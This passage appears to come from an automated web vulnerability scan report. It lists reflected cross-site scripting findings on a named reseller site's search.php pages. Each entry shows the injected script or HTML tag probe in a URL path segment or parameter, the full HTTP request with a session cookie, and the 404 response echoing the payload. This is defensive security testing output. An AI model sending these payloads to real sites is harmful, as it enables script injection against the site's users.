<p>The requested URL /detail/102c35a<script>alert(1)</script>0fa9bf857ec/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.873. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b2ba<script>alert(1)</script>483786ce87a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes6b2ba<script>alert(1)</script>483786ce87a/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes6b2ba<script>alert(1)</script>483786ce87a/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.874. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84953<script>alert(1)</script>1768e6af068 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos84953<script>alert(1)</script>1768e6af068/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos84953<script>alert(1)</script>1768e6af068/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.875. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8e8e4<script>alert(1)</script>4e27a64ab11 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images8e8e4<script>alert(1)</script>4e27a64ab11/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images8e8e4<script>alert(1)</script>4e27a64ab11/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.876. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 464e1<script>alert(1)</script>9e74ad4692 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating464e1<script>alert(1)</script>9e74ad4692/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating464e1<script>alert(1)</script>9e74ad4692/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.877. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f0dd9<script>alert(1)</script>fa315a1150d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/search.phpf0dd9<script>alert(1)</script>fa315a1150d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.phpf0dd9<script>alert(1)</script>fa315a1150d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.878. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c5cc2<a>3909e78ee18 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchc5cc2<a>3909e78ee18&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchc5cc2<a>3909e78ee18&opt=2 was not found on this server.</p>
...[SNIP]...

2.879. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eca48<a>913d5b418a6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...eca48<a>913d5b418a6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.php?keyword=search...eca48<a>913d5b418a6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.880. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 53dfd<script>alert(1)</script>92fa315e11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&53dfd<script>alert(1)</script>92fa315e11d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&53dfd<script>alert(1)</script>92fa315e11d=1 was not found on this server.</p>
...[SNIP]...

2.881. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a52fd<a>319afd6050b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2a52fd<a>319afd6050b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2a52fd<a>319afd6050b was not found on this server.</p>
...[SNIP]...

2.882. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 203f6<script>alert(1)</script>81bbccc3b53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail203f6<script>alert(1)</script>81bbccc3b53/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail203f6<script>alert(1)</script>81bbccc3b53/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.883. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55e6d<script>alert(1)</script>803dc9499ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1055e6d<script>alert(1)</script>803dc9499ff/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1055e6d<script>alert(1)</script>803dc9499ff/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.884. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55afd<script>alert(1)</script>5dae8cd5998 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes55afd<script>alert(1)</script>5dae8cd5998/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes55afd<script>alert(1)</script>5dae8cd5998/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.885. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16867<script>alert(1)</script>86b5f31cfb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos16867<script>alert(1)</script>86b5f31cfb6/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos16867<script>alert(1)</script>86b5f31cfb6/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.886. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 55f77<script>alert(1)</script>57a6977e5d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images55f77<script>alert(1)</script>57a6977e5d6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images55f77<script>alert(1)</script>57a6977e5d6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.887. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f46e5<script>alert(1)</script>5a5fd95a62a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/search.phpf46e5<script>alert(1)</script>5a5fd95a62a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.phpf46e5<script>alert(1)</script>5a5fd95a62a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.888. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7d9be<a>c07426db939 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7d9be<a>c07426db939&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7d9be<a>c07426db939&opt=2 was not found on this server.</p>
...[SNIP]...

2.889. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 45012<a>5659271a0d6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...45012<a>5659271a0d6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/search.php?keyword=search...45012<a>5659271a0d6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.890. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6d2be<script>alert(1)</script>b74c7351535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6d2be<script>alert(1)</script>b74c7351535=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
